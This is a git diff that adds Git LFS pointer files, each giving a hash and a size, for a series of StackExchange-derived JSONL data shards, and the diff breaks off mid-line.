a/data/stackexchange/1-1/2084_2289.jsonl b/data/stackexchange/1-1/2084_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c414bfb373c85374696c57db993824aa5474408 --- /dev/null +++ b/data/stackexchange/1-1/2084_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be2e3683376b5c6467154c57ce997ec1330ece53f5063a82758368b43d4fe196 +size 39248308 diff --git a/data/stackexchange/1-1/2085_2289.jsonl b/data/stackexchange/1-1/2085_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e86acd84d99fe0fb1f49b4c9acdc6102554a23b --- /dev/null +++ b/data/stackexchange/1-1/2085_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3649852affacb47f1b31bcffa57f0c6aa7b8b5b9b9f3614117b177dc7484d0c9 +size 39755634 diff --git a/data/stackexchange/1-1/2086_2289.jsonl b/data/stackexchange/1-1/2086_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0de67334f0c5981036beb205e8884604b44ed604 --- /dev/null +++ b/data/stackexchange/1-1/2086_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b51b0b7407e2f329c57bc3f49f011e4d8a2a0a5a9b5c9c705899ffb7ee54ab0 +size 38701199 diff --git a/data/stackexchange/1-1/2087_2289.jsonl b/data/stackexchange/1-1/2087_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..013b624f152b1ed88b95282636c336c6174c4482 --- /dev/null +++ b/data/stackexchange/1-1/2087_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8fa6296b2ab4de1382fe220616fe4bf55ab7bce464c166ea27ec00ef036aa7cb +size 39539858 diff --git a/data/stackexchange/1-1/2088_2289.jsonl b/data/stackexchange/1-1/2088_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05728a8acf8ed9d27509681084b9c2361119833b --- /dev/null +++ b/data/stackexchange/1-1/2088_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:274fce95bc11934bd0db7be360bd9e1dc369971b65fb8ddba0c1c537e8744c5d +size 38929564 diff --git a/data/stackexchange/1-1/2089_2289.jsonl b/data/stackexchange/1-1/2089_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5f08884b8152da0295ec203fd6464434002653d --- /dev/null +++ b/data/stackexchange/1-1/2089_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f5e3828269b49b8b723860a0802eef8a2deb62478e6810a2f8353ed37f092e0 +size 35566589 diff --git a/data/stackexchange/1-1/208_2289.jsonl b/data/stackexchange/1-1/208_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..686699c68fe4bfa397510be7094982350edb904d --- /dev/null +++ b/data/stackexchange/1-1/208_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a26bc6ce02d80f633eb690bfb7ef846d255a31b121219ec2599c344962b78c0e +size 39031944 diff --git a/data/stackexchange/1-1/2090_2289.jsonl b/data/stackexchange/1-1/2090_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd082654002226e8129a650559747f93fe78e9ca --- /dev/null +++ b/data/stackexchange/1-1/2090_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1da8ed889a5f955e8d385f6121d93ab5afb28b94c9979d96e2aa8f462aaf329 +size 34537172 diff --git a/data/stackexchange/1-1/2091_2289.jsonl b/data/stackexchange/1-1/2091_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..443d9519c0000fa58a40f3d9de321ed66e003693 --- /dev/null +++ b/data/stackexchange/1-1/2091_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcbb677665650fe28fc738dee1ccfb57f9c391fe864370f3dd8798bc530d010a +size 35131530 diff --git a/data/stackexchange/1-1/2092_2289.jsonl b/data/stackexchange/1-1/2092_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50bd94b2889f746d881f691022ae9eaed8524154 --- /dev/null +++ b/data/stackexchange/1-1/2092_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c716171a64a674a8a0ce3656c7080cd06fe92df5acaf388175431d6e8b1f8fcc +size 34983821 diff --git a/data/stackexchange/1-1/2093_2289.jsonl b/data/stackexchange/1-1/2093_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..653d8e65e5ae922b9f3e7f58f5bd1e697e438ce8 --- /dev/null +++ b/data/stackexchange/1-1/2093_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c26a00a924212bfd90e522c2ec23cf0c15597cfad1656b0b156cc6f664696dfa +size 34944133 diff --git a/data/stackexchange/1-1/2094_2289.jsonl b/data/stackexchange/1-1/2094_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bcdbdb53754a191015f87dc097603aff65b5bb0c --- /dev/null +++ b/data/stackexchange/1-1/2094_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b0408177747326c82b23c9df334c9480963fa28e571be6a75c818a82552e7d0 +size 34671985 diff --git a/data/stackexchange/1-1/2095_2289.jsonl b/data/stackexchange/1-1/2095_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef960a56fabfe959d1581745567a7fd60305fb3 --- /dev/null +++ b/data/stackexchange/1-1/2095_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1622654c4347af041840ade4f5fae34d46c3e5c4a25eb55ae52eae9edc2fa55 +size 35042852 diff --git a/data/stackexchange/1-1/2096_2289.jsonl b/data/stackexchange/1-1/2096_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..530e711992cfb9ac5163eea65229976eb88c7fe1 --- /dev/null +++ b/data/stackexchange/1-1/2096_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4b27e65585a84bf78946a4ebf633d1c253cf2000cb30573420245a6d38a3d12 +size 34968999 diff --git a/data/stackexchange/1-1/2097_2289.jsonl b/data/stackexchange/1-1/2097_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9100dc309ad3ae7cffb92a8a2c1c6a487d5b86be --- /dev/null +++ b/data/stackexchange/1-1/2097_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af0c67aec6f19a23e39ce217bbdb85d5e137faaad4240c2cbaa716f4ea8e9a6c +size 34555254 diff --git a/data/stackexchange/1-1/2098_2289.jsonl b/data/stackexchange/1-1/2098_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ffb796034f773f8aec31dc2622e9cdbca6df7f27 --- /dev/null +++ b/data/stackexchange/1-1/2098_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0824c3e7704678a1e8ec700c92957d31cce118409d7d9c8e2feeb6862ce65687 +size 34480542 diff --git a/data/stackexchange/1-1/2099_2289.jsonl b/data/stackexchange/1-1/2099_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3042b86ab52c14d2f98dde648d9a2e4e1c89e908 --- /dev/null +++ b/data/stackexchange/1-1/2099_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb46b39e04946bd9cb8ad06d233711c42b81b0115f7153da77e96478f0690085 +size 34783617 diff --git a/data/stackexchange/1-1/209_2289.jsonl b/data/stackexchange/1-1/209_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a0cc69b9e97d434e6bb0e4ab28ec945c92158fa --- /dev/null +++ b/data/stackexchange/1-1/209_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34c79d66fb6cab578a66a5667e39695d87a4c61d95b8011bd4572041daa7020a +size 38052676 diff --git a/data/stackexchange/1-1/20_2289.jsonl b/data/stackexchange/1-1/20_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0873fc9a074309a059da5eab073e85c00d0c0df0 --- /dev/null +++ b/data/stackexchange/1-1/20_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f632a66f5986384ac209a3749b6cc7f6a35a98759fb51d49d648ee16a8f0b43a +size 35964262 diff --git a/data/stackexchange/1-1/2100_2289.jsonl b/data/stackexchange/1-1/2100_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54b7c71e8516fdd91600ff0103ef62f738b774f6 --- /dev/null +++ b/data/stackexchange/1-1/2100_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8fe21e082c23d462a0ef4cdc5a2e8fe43e177703f44159a157692f8365afba8f +size 34894901 diff --git a/data/stackexchange/1-1/2101_2289.jsonl b/data/stackexchange/1-1/2101_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af1765870c8679af673a7b2fa8fcb3a4b67e4e0b --- /dev/null +++ b/data/stackexchange/1-1/2101_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:413d7fc44690ee50e796b96097f26f3a92447ed974e0f691c9da4474b496b160 +size 35006323 diff --git a/data/stackexchange/1-1/2102_2289.jsonl b/data/stackexchange/1-1/2102_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2847bd5e2b8387ce1e3b64b963c9ada3daa07a47 --- /dev/null +++ b/data/stackexchange/1-1/2102_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:37940b98fab84ecaf2eb0988e8dae017e49c051720772d37261a8ef6b49d838d +size 34769775 diff --git a/data/stackexchange/1-1/2103_2289.jsonl b/data/stackexchange/1-1/2103_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..15578787e3da655f2e46ce8973796fbbd29b1061 --- /dev/null +++ b/data/stackexchange/1-1/2103_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce89f2e7a67cbb3cf37d4784731558e92e776257425e562b4267f31dd561747f +size 34898702 diff --git a/data/stackexchange/1-1/2104_2289.jsonl b/data/stackexchange/1-1/2104_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f88685757c7225b9f0fe5dc266465149e98c895 --- /dev/null +++ b/data/stackexchange/1-1/2104_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83596f8a9fd56faece341cfc418223b3230e96aed3489aec5838fbc573811ec7 +size 34720139 diff --git a/data/stackexchange/1-1/2105_2289.jsonl b/data/stackexchange/1-1/2105_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39c4b534346410f742c09d13ac660e5a6fb90e13 --- /dev/null +++ b/data/stackexchange/1-1/2105_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baf257ad19ac5c6cc42185e9b7b5cd224e6185cf25223ede40c85fc3482101e9 +size 34610113 diff --git a/data/stackexchange/1-1/2106_2289.jsonl b/data/stackexchange/1-1/2106_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..595f965555e60cbe56b63dbb8663dc6993d1fce9 --- /dev/null +++ b/data/stackexchange/1-1/2106_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e816198700fe54b6336da9eade0a45f8a1bf3c00c4bc1043e14a98dc9bf91a9c +size 34547105 diff --git a/data/stackexchange/1-1/2107_2289.jsonl b/data/stackexchange/1-1/2107_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ebecd3a50c04c97cea68d80d88cd0dee74b2a85 --- /dev/null +++ b/data/stackexchange/1-1/2107_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d05af955569aac711de6e7893f20be0bd5c108c52c88f9a5aa00231986844f4 +size 34747882 diff --git a/data/stackexchange/1-1/2108_2289.jsonl b/data/stackexchange/1-1/2108_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..661ecbd16d385b6bdd8e8b1ed0ce6bf6f91f6f34 --- /dev/null +++ b/data/stackexchange/1-1/2108_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fc7bcc91ba50a93f2fefea4af88b56e78876b62892288784815aa54fd6addfb +size 34571863 diff --git a/data/stackexchange/1-1/2109_2289.jsonl b/data/stackexchange/1-1/2109_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0879b9e8a4ee61e4677d0ee7cc20713c62a9fce7 --- /dev/null +++ b/data/stackexchange/1-1/2109_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad679bf02d5194f53d037dbb6c288b55f325d65510c6e5601391a178bbb312b4 +size 35062449 diff --git a/data/stackexchange/1-1/210_2289.jsonl b/data/stackexchange/1-1/210_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0495b6400b7850b95ff8c71a27ddf2af14aeacda --- /dev/null +++ b/data/stackexchange/1-1/210_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9916da6f796c01b9e8e14cf84f8553dc7a7d9963b5ce5757cdd206e822dad83 +size 38230225 diff --git a/data/stackexchange/1-1/2110_2289.jsonl b/data/stackexchange/1-1/2110_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c86515c9e82591c565c4b3d4c8f7b5495c73a7e --- /dev/null +++ b/data/stackexchange/1-1/2110_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d21e858a37f570f77286ac3ce7df915ff2ed4c1fe689fc3e39beae6b300fcdeb +size 34911710 diff --git a/data/stackexchange/1-1/2111_2289.jsonl b/data/stackexchange/1-1/2111_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ac6f7d7033904e20ad03732395c19148fc9380f --- /dev/null +++ b/data/stackexchange/1-1/2111_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f6cadc707cd57f2616b130d735a6926a420feac3e09b161f078c9b2f75792dd +size 34771213 diff --git a/data/stackexchange/1-1/2112_2289.jsonl b/data/stackexchange/1-1/2112_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9202d4e982fd066a9377801eb9d7fa59229b3a5a --- /dev/null +++ b/data/stackexchange/1-1/2112_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be28eaa4274e88a30f2878fc15bda1ae18862b19b1694428617dc8062ac7694c +size 34373128 diff --git a/data/stackexchange/1-1/2113_2289.jsonl b/data/stackexchange/1-1/2113_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69abb87dc799c7ae2c73efaec572129d71b7d56b --- /dev/null +++ b/data/stackexchange/1-1/2113_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ddcea3c7aa210904c89f4eaaa37ad2a6b1864b9eefff6f8acec91029aacdf1a6 +size 34881228 diff --git a/data/stackexchange/1-1/2114_2289.jsonl b/data/stackexchange/1-1/2114_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b5e838693ebea77632be5c1797eb06381f66bd9b --- /dev/null +++ b/data/stackexchange/1-1/2114_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4ba7a2e4aa4d217f282caa2673435082c1c910e7b0ad94fa9de45fe9c4dd5ab +size 34412996 diff --git a/data/stackexchange/1-1/2115_2289.jsonl b/data/stackexchange/1-1/2115_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f5295c1f0703cf33c8e2d367864d7ed1b9ea823 --- /dev/null +++ b/data/stackexchange/1-1/2115_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0037b523d2a6405fd3e23aa4a2413dfe9454dce0d4c7e11c14db9879587604ca +size 34326918 diff --git a/data/stackexchange/1-1/2116_2289.jsonl b/data/stackexchange/1-1/2116_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d8d350e414a7afeb183a5ff38b8fd3bad72aef6 --- /dev/null +++ b/data/stackexchange/1-1/2116_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfc15d0a7be9c96c6bff5b6857522427966a39de7ce32bea5c8fbb185657e7b0 +size 34520290 diff --git a/data/stackexchange/1-1/2117_2289.jsonl b/data/stackexchange/1-1/2117_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96f3d50c985f9425855dc20586dffc5b21b261f7 --- /dev/null +++ b/data/stackexchange/1-1/2117_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:387afe1d933bb9a109b0768bf4194029b88614f5dab12dec6d28028634623908 +size 35003473 diff --git a/data/stackexchange/1-1/2118_2289.jsonl b/data/stackexchange/1-1/2118_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97a2fc1b50a976e04fa3d92c66eaddd762089ef5 --- /dev/null +++ b/data/stackexchange/1-1/2118_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8110c343987305d49c9f5ac79151046c298d4782b6a9c3832b85c74cc7e7d0b8 +size 35037725 diff --git a/data/stackexchange/1-1/2119_2289.jsonl b/data/stackexchange/1-1/2119_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4dcd14f3071a2f3dfb3072dfa97e45cb30984a6e --- /dev/null +++ b/data/stackexchange/1-1/2119_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b02006668d145ebe425358990ca2416f4125a98b427510e7031bbf3e3b3aaa4 +size 34673713 diff --git a/data/stackexchange/1-1/211_2289.jsonl b/data/stackexchange/1-1/211_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45287526c3e7d81c1f9e8fe94870b62efaffe65e --- /dev/null +++ b/data/stackexchange/1-1/211_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aebdee8d609dd3e8761b1f5110675743cb0efa59a66a8f994cf0af86ed6c99dc +size 37260633 diff --git a/data/stackexchange/1-1/2120_2289.jsonl b/data/stackexchange/1-1/2120_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e20b049fdd137b63bffede88cc29b97214468bb --- /dev/null +++ b/data/stackexchange/1-1/2120_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5db5cc12e3f8743274c6a1ac54682f21e9467b84f22ea3cb10c44f7beea8c6be +size 35076154 diff --git a/data/stackexchange/1-1/2121_2289.jsonl b/data/stackexchange/1-1/2121_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ff94c25c58f90a24d1f1808d885921cc1ea5b4ee --- /dev/null +++ b/data/stackexchange/1-1/2121_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d09c971bb1dca8a66a75b47565cc835ce437755c7a0b3e06cb4315a786f5c61 +size 34462112 diff --git a/data/stackexchange/1-1/2122_2289.jsonl b/data/stackexchange/1-1/2122_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fe1634c22de280fb5752e909e270f81bf6ce456 --- /dev/null +++ b/data/stackexchange/1-1/2122_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53f3cec55597cb47da575590a752ed26ffa6f926b3f9c150efe257d45701b3e5 +size 35039037 diff --git a/data/stackexchange/1-1/2123_2289.jsonl b/data/stackexchange/1-1/2123_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d120be1108b109d74512696bdd815096fb3a7e6 --- /dev/null +++ b/data/stackexchange/1-1/2123_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e450d705a8e23db50bbf4d0a7c8f5eba0f19918cf5191a8538e691508f3e845 +size 35068599 diff --git a/data/stackexchange/1-1/2124_2289.jsonl b/data/stackexchange/1-1/2124_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..86eb07a221406cb348582b915dc1a43b1d617d8b --- /dev/null +++ b/data/stackexchange/1-1/2124_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edbf44500f010d3b8c69e5de828a94454e78f9c34b644bd8888195a04a139206 +size 34839543 diff --git a/data/stackexchange/1-1/2125_2289.jsonl b/data/stackexchange/1-1/2125_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef0f1e26e0898a0ddd9447ff334a195d0982827 --- /dev/null +++ b/data/stackexchange/1-1/2125_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb7602c2304091038f1c8ba9dce1fbc9091b7e8195f4fbcac02996f72e2ce187 +size 34734888 diff --git a/data/stackexchange/1-1/2126_2289.jsonl b/data/stackexchange/1-1/2126_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88a6cdcffe41caf1e4613f3ab70c7542907e5909 --- /dev/null +++ b/data/stackexchange/1-1/2126_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdedc0e9a1b8148dc94c88faec6738f3cad2ba46c982c4f9d8e73b6d5b4222fe +size 34756092 diff --git a/data/stackexchange/1-1/2127_2289.jsonl b/data/stackexchange/1-1/2127_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0832d2c20ccd9a54631a167b16c0ff555b78ec4 --- /dev/null +++ b/data/stackexchange/1-1/2127_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1630a1c7b27a200c61267cae69e8fb1316470568a2901077a0198857550e2a75 +size 35198379 diff --git a/data/stackexchange/1-1/2128_2289.jsonl b/data/stackexchange/1-1/2128_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..192c2af3729b8ccea5304a3fc7ae9684a4776764 --- /dev/null +++ b/data/stackexchange/1-1/2128_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2f2877602cf229202444232905046add68224a6fc9a9095024c3cd9706ae8a0 +size 34933015 diff --git a/data/stackexchange/1-1/2129_2289.jsonl b/data/stackexchange/1-1/2129_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7d786cc7f2119fd5cc82160281104317015ada6 --- /dev/null +++ b/data/stackexchange/1-1/2129_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94f3c690da79c1a1e531525f21a7df749d47b62fca117a210e9fff8e90408a36 +size 34506115 diff --git a/data/stackexchange/1-1/212_2289.jsonl b/data/stackexchange/1-1/212_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b148bf2db513554b69afc29d0db4a2b27ddf56d9 --- /dev/null +++ b/data/stackexchange/1-1/212_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ecab710bb7e6185e5f7dfad6645d03af0ab854e5333a50e1e9852df9e9005ea6 +size 37835790 diff --git a/data/stackexchange/1-1/2130_2289.jsonl b/data/stackexchange/1-1/2130_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab9634369c3e101a7a392993e1d4a5879bef40e6 --- /dev/null +++ b/data/stackexchange/1-1/2130_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ec0165e2e861bc44a3f4fe939fc350d65105eb54a6ecfd80b9cc9eac5029b2e +size 34560330 diff --git a/data/stackexchange/1-1/2131_2289.jsonl b/data/stackexchange/1-1/2131_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..787ef1aa1c44baad1e8221b70716932e75c0d810 --- /dev/null +++ b/data/stackexchange/1-1/2131_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41c3d5c1295e77146a87ea534052266423d85ca74c40970275b948bf9822839e +size 35071810 diff --git a/data/stackexchange/1-1/2132_2289.jsonl b/data/stackexchange/1-1/2132_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f16432bd36f0b653aa659ba68f8b8272d28811c --- /dev/null +++ b/data/stackexchange/1-1/2132_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39bda9fe84cd5f7b34f841c90351db09549a5cf02ef650033901c6fe0ccd0059 +size 34176742 diff --git a/data/stackexchange/1-1/2133_2289.jsonl b/data/stackexchange/1-1/2133_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ff16ffe14aa1c9178dc02fe99ceff187492f026 --- /dev/null +++ b/data/stackexchange/1-1/2133_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1acfe8f61238a32d6a17153be87047a86693973690c207cec3665d9275096f60 +size 34455681 diff --git a/data/stackexchange/1-1/2134_2289.jsonl b/data/stackexchange/1-1/2134_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2091e619d4b4c8af436f9648b7bffade2405fb0c --- /dev/null +++ b/data/stackexchange/1-1/2134_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bee0e5ac57836bec1b987626484952a41570ea6a744e6a8cc861fb398b951546 +size 34694951 diff --git a/data/stackexchange/1-1/2135_2289.jsonl b/data/stackexchange/1-1/2135_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b798b2f19b8d1d716300a00e934b030e460813b --- /dev/null +++ b/data/stackexchange/1-1/2135_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7964fb322199fb7df581d2cb03688c1fa729807135d920afd52794471f334e8 +size 35260946 diff --git a/data/stackexchange/1-1/2136_2289.jsonl b/data/stackexchange/1-1/2136_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a53aba3f3298482bb5a6ea9676d21b350f1e7c3 --- /dev/null +++ b/data/stackexchange/1-1/2136_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:378bd9dbd423cc679b2402f021c5b0be42061311c5ced447677dc386863efd4e +size 35001900 diff --git a/data/stackexchange/1-1/2137_2289.jsonl b/data/stackexchange/1-1/2137_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b324931fe6cfe748a6190a9b06f5dc962a134ca5 --- /dev/null +++ b/data/stackexchange/1-1/2137_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5091113a0e6cc1137a983ec11106d54be1e7f8cd67da77a15f80a63a2e5a3865 +size 34932595 diff --git a/data/stackexchange/1-1/2138_2289.jsonl b/data/stackexchange/1-1/2138_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aaf52d15fc92bfb932f91b6a7dea07ce05dc0a61 --- /dev/null +++ b/data/stackexchange/1-1/2138_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f71562e899037c4b922ce306acfb09250419a194e306fc0589a24b7e51f709db +size 34954580 diff --git a/data/stackexchange/1-1/2139_2289.jsonl b/data/stackexchange/1-1/2139_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9329f714c2b02d07aab3098d390c97b1c09d72a0 --- /dev/null +++ b/data/stackexchange/1-1/2139_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9491c73deb80989804b59f411c514bfbb5bf0128658adbd7b8f5294ee9be6c5a +size 33673405 diff --git a/data/stackexchange/1-1/213_2289.jsonl b/data/stackexchange/1-1/213_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..296e1257ccd318a46082e45caadbd27e108f0e0f --- /dev/null +++ b/data/stackexchange/1-1/213_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02768d828ad21e6e8727dcf5973ddae0fd8c51204d88495e2335cf5395496bef +size 37711606 diff --git a/data/stackexchange/1-1/2140_2289.jsonl b/data/stackexchange/1-1/2140_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b46117d79bee56adb69d8c5d9f768afd179450da --- /dev/null +++ b/data/stackexchange/1-1/2140_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f024bf970e59face2a9bb9496fd3e17819cd45be4eed732fdf11234f6c6df0a +size 34016732 diff --git a/data/stackexchange/1-1/2141_2289.jsonl b/data/stackexchange/1-1/2141_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89d764304b9f48f7c745c9c3ed27c698c3173aea --- /dev/null +++ b/data/stackexchange/1-1/2141_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec20779f68f3e49b3f52cdb09d5a65a718286e5fab14ba8cd49ae2ea6fb4ae79 +size 34492214 diff --git a/data/stackexchange/1-1/2142_2289.jsonl b/data/stackexchange/1-1/2142_2289.jsonl new file mode 100644 index 